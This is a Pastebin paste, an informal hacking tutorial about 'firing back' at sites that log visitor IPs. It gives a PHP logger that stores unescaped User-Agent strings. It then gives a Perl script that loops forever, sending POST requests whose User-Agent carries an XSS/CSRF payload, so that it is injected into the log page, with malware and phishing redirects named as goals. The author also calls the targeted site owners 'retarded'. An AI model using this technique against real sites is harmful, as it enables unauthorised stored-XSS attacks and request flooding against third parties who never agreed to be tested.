Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ~————————————————————–~
- ~Crafted User Agent~
- ~Flexibilty in modern Pentesting~
- ~Hitting Back With an upper Hand Against Pesky Ip Logging~
- ~————————————————————–~
- Basic Code In PHP for ip loggers.
- ~————————————————————–~
- $ip = $_SERVER[‘REMOTE_ADDR’];
- $agent = $_SERVER[‘HTTP_USER_AGENT’];
- $output = "IP: $ip - Agent: $agent"
- “;
- $fopen = fopen(“ip.html”, “a”);
- fwrite($fopen, $output);
- fclose($fopen);
- ?>
- ~——————————————————————-~
- In Most of these retarded sites, Mostly Scene kid sites.
- Run a Ip Logger On The Index page. Honestly its retarded how
- They do this as some of these “Scene kids” Call For NO LOGS !!!
- But Log Themselves ?. This is the basics of Crafting a Agent
- and Effectively Sabotaging What they have came to Create.
- Its honestly some of the most retarded kids that would do this
- and some are actually just using it for research on the sites
- traffic, not just to keep logs. However some do Either way.
- For the pages that do log, the worse thing to come to them would
- be the User Agent Strings in their php codes. Why is this a
- problem ? The php code is Their to display the incoming user agent.
- So what ? Displaying the user agent isnt that bad right ?
- Alot of times it isnt. Its usually harmless unless they actually
- store the logs. This could lead to CSRF/XSS that leads to Malware
- and Redirects to Phishing etc.
- ~——————————————————————-~
- #!usr/bin/perl -w
- #Basic LWP User Agent Script for a Crafted User Agent.
- use LWP::UserAgent;
- use strict;
- print “Basics of a Crafted User Agent\n”;
- while(1){
- my $ua = LWP::UserAgent->new;
- $ua->agent(“CSRF/XSS Code”);
- my $req = HTTP::Request->new(POST => “IPLOGGER PAGE GOES HERE”);
- $req->content_type(‘application/x-www-form-urlencoded’);
- $req->content(‘query=libwww-perl&mode=dist’);
- my $res = $ua->request($req);
- if ($res->is_success) {
- print “Success !\n”;
- }
- else {
- print “Aw\n”;
- }
- }
- ~——————————————————————-~
- You can do all kinds of things with this. Infact you can add a whole
- page within your limits. Hope This shows the basic of Crafted Requests
- and a better grip on Firing Back.
- ~——————————————————————-~
- Knowledge Is Power
- Hacking isnt Swatting,Doxing or DDOS
- Its all about Thinking Outside the boxes Limits
- Best Luck to everyone In the future !
- – SonnySpooks –
- ~——————————————————————-~
- _.-“\
- _.-” \ Dont mind this…
- ,-” \
- ( \ 100 Reasons\
- \ \ IIS is \
- \ \ Trash \
- \ \ _.-;
- \ \ _.-” :
- \ \,-” _.-”
- \( _.-”
- `–“
Add Comment
Please, Sign In to add comment